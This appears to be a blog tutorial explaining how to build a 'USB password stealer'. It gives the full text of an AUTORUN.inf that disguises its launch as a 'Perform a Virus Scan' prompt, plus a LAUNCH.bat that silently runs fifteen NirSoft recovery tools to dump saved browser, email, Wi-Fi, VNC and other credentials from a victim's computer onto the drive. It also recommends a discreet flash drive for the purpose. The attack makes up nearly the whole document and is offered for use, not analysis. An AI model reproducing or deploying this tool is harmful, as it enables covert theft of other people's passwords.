USB password stealer

















This tutorial will walk you through setting up a USB flash drive to steal the saved passwords on a computer. If you're looking for a super tiny, super discreet flash drive, we recommend SanDisk Cruzer Fit CZ33 64GB USB 2.0 Low-Profile Flash Drive- SDCZ33-064G-B35

Image result for usb password stealer



  • open notepad/wordpad
  •  type:

  •     [autorun]
        open=launch.bat
        ACTION= Perform a Virus Scan


    • save this as AUTORUN.inf
    • open a new notepad/wordpad document
    • type:


        start mspass.exe /stext mspass.txt

        start mailpv.exe /stext mailpv.txt

        start iepv.exe /stext iepv.txt

        start pspv.exe /stext pspv.txt

        start PasswordFox.exe /stext passwordfox.txt

        start OperaPassView.exe /stext OperaPassView.txt

        start ChromePass.exe /stext ChromePass.txt

        start Dialupass.exe /stext Dialupass.txt

        start netpass.exe /stext netpass.txt

        start WirelessKeyView.exe /stext WirelessKeyView.txt

        start BulletsPassView.exe /stext BulletsPassView.txt

        start VNCPassView.exe /stext VNCPassView.txt

        start OpenedFilesView.exe /stext OpenedFilesView.txt

        start ProduKey.exe /stext ProduKey.txt

        start USBDeview.exe /stext USBDeview.txt

    •     save this as LAUNCH.bat
    •     copy the autorun and launch file to your USB
    •     go to http://www.nirsoft.net/ and download the programs named in step 2
    •     extract the files you downloaded to your desktop and copy all the .exe files to your USB
    •     remove and re-insert your USB
    •     click on the option perform a virus scan
    (this is an exemple, if you want it to say something else go to the autorun file and change it ;) )
        go to my computer---> USB DRIVE and open it

    •     you will now see some text files, if you open them you will see usernames and passwords

        NOTE: This only recovers passwords that have once been saved on your computer
     

    Comments

    Popular posts from this blog

    Using Kali Linux: Perform Website Cloning via SET toolkit

    What is Log4j Vulnerability ?

    How To Stop Becoming a Bait (A Cyber Security Methodology)